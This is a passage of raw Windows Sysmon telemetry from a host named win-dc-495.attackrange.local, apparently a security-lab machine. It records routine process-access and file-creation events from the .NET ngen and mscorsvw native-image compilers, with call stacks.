Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.218{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dc8-0\System.IO.Compression.FileSystem.dll2021-01-18 13:47:32.218 10341000x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.171{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8502-00000000A301}3528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:32.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9174-6005-8402-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:32.077{59A5CD1D-9173-6005-8302-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1140-0\System.IO.Compression.dll2021-01-18 13:47:32.077 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.609{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.609{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8C02-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.546{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8B02-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:33.484{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1390-0\System.Management.Instrumentation.dll2021-01-18 13:47:33.484 10341000x80000000000000006736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.202{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.202{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.202{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8A02-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.124{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:33.124{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9175-6005-8902-00000000A301}4168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:34.968{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d58-0\System.Numerics.dll2021-01-18 13:47:34.968 10341000x80000000000000006764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.749{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.749{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9202-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:34.718{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9176-6005-9102-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 